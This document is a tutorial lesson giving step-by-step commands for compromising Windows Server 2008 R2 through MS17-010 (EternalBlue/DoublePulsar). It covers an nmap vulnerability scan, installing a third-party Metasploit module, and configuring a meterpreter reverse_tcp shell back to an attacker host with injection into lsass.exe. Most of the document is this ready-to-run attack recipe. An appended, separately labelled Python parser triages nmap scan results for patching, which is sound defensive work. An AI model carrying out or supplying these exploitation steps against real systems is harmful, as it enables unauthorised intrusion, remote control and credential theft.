- Lesson 54: Attacking and taking over Windows Server 2008 R2 x64 (exploiting ms17_010)
- Command to scan for the vulnerability with nmap: nmap -T4 -A -v --script smb-vuln-ms17-010 192.168.1.7
- Install the exploit module into Metasploit
- apt-get update
- apt-get install wine32
- git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git
- copy the deps directory and the eternal.rb file to /usr/share/metasploit-framework/modules/exploits/windows/smb
- msfconsole
- search eternalblue
- use exploit/windows/smb/eternalblue_doublepulsar
- set PAYLOAD windows/meterpreter/reverse_tcp (if the OS is 64-bit, use: windows/x64/meterpreter/reverse_tcp)
- set DOUBLEPULSARPATH /usr/share/metasploit-framework/modules/exploits/windows/smb/deps
- set ETERNALBLUEPATH /usr/share/metasploit-framework/modules/exploits/windows/smb/deps
- show targets
- set target 9
- set WINEPATH /root/
- set TARGETARCHITECTURE x86 (if the OS is 64-bit, replace x86 with x64)
- set RHOST IP Victim
- set LHOST IP Hacker
- set PROCESSINJECT lsass.exe (if the victim machine runs a 64-bit OS; most Windows Server installations are 64-bit)
- exploit
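
The nmap scan in the first step is also how a defender finds hosts that still need the MS17-010 update. The following is an added example, not part of the original paste: a Python parser that reads nmap's normal output and classifies each host by what the smb-vuln-ms17-010 script reported. The sample report, addresses, hostname and function names are constructed for illustration.

```python
import re

# Constructed sample of nmap normal output; addresses and hostname are illustrative.
SAMPLE = """\
Nmap scan report for 192.168.1.7
PORT    STATE SERVICE
445/tcp open  microsoft-ds
Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|_    Risk factor: HIGH

Nmap scan report for fileserver.lab (192.168.1.8)
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Nmap scan report for 192.168.1.9
PORT    STATE  SERVICE
445/tcp closed microsoft-ds
"""

SCRIPT = "smb-vuln-ms17-010"

def triage(report):
    """Classify each host in the report (hypothetical helper, not an nmap API)."""
    results, host, in_script = {}, None, False
    for line in report.splitlines():
        header = re.match(r"^\|_? ?([\w-]+):", line)  # start of a script's output
        if line.startswith("Nmap scan report for "):
            host = line.split()[-1].strip("()")
            results[host], in_script = "not-flagged", False
        elif host is None:
            continue
        elif re.match(r"^445/tcp\s+(closed|filtered)\b", line):
            results[host] = "smb-unreachable"
        elif header:
            in_script = header.group(1) == SCRIPT  # ignore other scripts' State lines
        elif in_script and re.match(r"^\|_?\s+State:\s+(LIKELY )?VULNERABLE\b", line):
            results[host] = "vulnerable"
        elif not line.startswith("|"):
            in_script = False
    return results

def needs_patch(report):
    """Hosts the script flagged, sorted for a patch ticket."""
    return sorted(h for h, s in triage(report).items() if s == "vulnerable")

if __name__ == "__main__":
    for host, status in triage(SAMPLE).items():
        print(f"{host}\t{status}")
```

Hosts reported as vulnerable need the MS17-010 security update; disabling SMBv1 on them removes the affected service.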